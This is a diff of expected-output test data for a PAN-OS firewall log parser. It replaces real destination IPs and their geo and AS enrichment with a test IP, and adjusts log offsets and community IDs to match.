-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2629,7 +2518,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2641,9 +2530,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 10734,
+        "log.offset": 10684,
         "network.application": "web-browsing",
-        "network.community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=",
+        "network.community_id": "1:OUEPS1h8GK3pSmhORzo/qS63sDk=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2675,13 +2564,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2701,19 +2590,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59271,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2724,7 +2609,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2736,9 +2621,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 11127,
+        "log.offset": 11075,
         "network.application": "web-browsing",
-        "network.community_id": "1:6AuZBrHKsUJjLNgm/mJ5QToaPo8=",
+        "network.community_id": "1:kqTI1IhQmPp1s0yUMx4LhKDTEDM=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2770,13 +2655,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2796,19 +2681,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59269,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2819,7 +2700,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2831,9 +2712,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 11520,
+        "log.offset": 11466,
         "network.application": "web-browsing",
-        "network.community_id": "1:NwAT+gtzMjRwKS71Tn+YaKwyOvI=",
+        "network.community_id": "1:PxgPFY7HoFKuk8lEU5b6qy1RpZM=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2865,13 +2746,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2891,19 +2772,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59270,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2914,7 +2791,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2926,9 +2803,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 11913,
+        "log.offset": 11857,
         "network.application": "web-browsing",
-        "network.community_id": "1:mTTbk9h6Dgx6lH3l4aEHguufZVE=",
+        "network.community_id": "1:mB6gyhRnEZzJ5f8dg12zlL2lIC4=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2960,13 +2837,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2986,19 +2863,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59274,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -3009,7 +2882,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -3021,9 +2894,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 12306,
+        "log.offset": 12248,
         "network.application": "web-browsing",
-        "network.community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=",
+        "network.community_id": "1:85UBXOVwZbnWWb+ZE7zvB6j8D6o=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -3055,13 +2928,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -3081,19 +2954,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59273,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -3104,7 +2973,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -3116,9 +2985,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 12699,
+        "log.offset": 12639,
         "network.application": "web-browsing",
-        "network.community_id": "1:VLKKVfau50s2qjTDcucU+VKCAqY=",
+        "network.community_id": "1:yycaucLRKClR6ShHLwUoe7RB7Kw=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -3150,13 +3019,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -3176,19 +3045,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59272,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -3199,7 +3064,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -3211,9 +3076,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 13092,
+        "log.offset": 13030,
         "network.application": "web-browsing",
-        "network.community_id": "1:jAvA0C85T0GFKryKA312lLEtKIM=",
+        "network.community_id": "1:IIS8d7UhbebihBbi99LWmWlcCpY=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -3245,13 +3110,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -3272,13 +3137,6 @@
         "client.port": 59261,
         "client.user.name": "crusher",
         "destination.address": "69.43.161.167",
-        "destination.as.number": 22489,
-        "destination.as.organization.name": "Castle Access Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "69.43.161.167",
         "destination.port": 80,
@@ -3302,7 +3160,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 13485,
+        "log.offset": 13421,
         "network.application": "web-browsing",
         "network.community_id": "1:Jqiwb/u74kolY3Y1yGkp+oMAxT4=",
         "network.direction": "inbound",
@@ -3370,13 +3228,6 @@
         "client.port": 59248,
         "client.user.name": "crusher",
         "destination.address": "202.31.187.154",
-        "destination.as.number": 17848,
-        "destination.as.organization.name": "INAMES",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "KR",
-        "destination.geo.country_name": "South Korea",
-        "destination.geo.location.lat": 37.5112,
-        "destination.geo.location.lon": 126.9741,
         "destination.geo.name": "Korea Republic Of",
         "destination.ip": "202.31.187.154",
         "destination.port": 80,
@@ -3400,7 +3251,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 13889,
+        "log.offset": 13825,
         "network.application": "web-browsing",
         "network.community_id": "1:q84mXt2kLt843wk0Y5vtvJwq+bc=",
         "network.direction": "inbound",
@@ -3468,13 +3319,6 @@
         "client.port": 59251,
         "client.user.name": "crusher",
         "destination.address": "89.111.176.67",
-        "destination.as.number": 41126,
-        "destination.as.organization.name": "CJSC Registrar R01",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7386,
-        "destination.geo.location.lon": 37.6068,
         "destination.geo.name": "Russian Federation",
         "destination.ip": "89.111.176.67",
         "destination.port": 80,
@@ -3498,7 +3342,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 14313,
+        "log.offset": 14249,
         "network.application": "web-browsing",
         "network.community_id": "1:1jDSU+BTdTOAQSrWGRbSjxehwNg=",
         "network.direction": "inbound",
@@ -3564,19 +3408,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59244,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -3587,7 +3427,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -3598,9 +3438,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 14717,
+        "log.offset": 14653,
         "network.application": "web-browsing",
-        "network.community_id": "1:vGp9HpobYZmzzLGyDAG6oVAe4dg=",
+        "network.community_id": "1:owrRdnl67haRQOD4YVhMjTnR9n8=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -3635,13 +3475,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -3666,13 +3506,6 @@
         "client.port": 59237,
         "client.user.name": "crusher",
         "destination.address": "208.73.210.29",
-        "destination.as.number": 40034,
-        "destination.as.organization.name": "Confluence Networks Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "208.73.210.29",
         "destination.port": 80,
@@ -3696,7 +3529,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 15135,
+        "log.offset": 15069,
         "network.application": "web-browsing",
         "network.community_id": "1:8JiI5Ka3Oyz6yaLm3xObTqAo/Jw=",
         "network.direction": "inbound",
@@ -3763,13 +3596,6 @@
         "client.port": 59238,
         "client.user.name": "crusher",
         "destination.address": "208.73.210.29",
-        "destination.as.number": 40034,
-        "destination.as.organization.name": "Confluence Networks Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "208.73.210.29",
         "destination.port": 80,
@@ -3793,7 +3619,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 15712,
+        "log.offset": 15646,
         "network.application": "web-browsing",
         "network.community_id": "1:lOdKYo+aMIHRMMJPawuXy8Bk2I0=",
         "network.direction": "inbound",
@@ -3859,19 +3685,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59010,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -3882,7 +3704,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -3893,9 +3715,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 16111,
+        "log.offset": 16045,
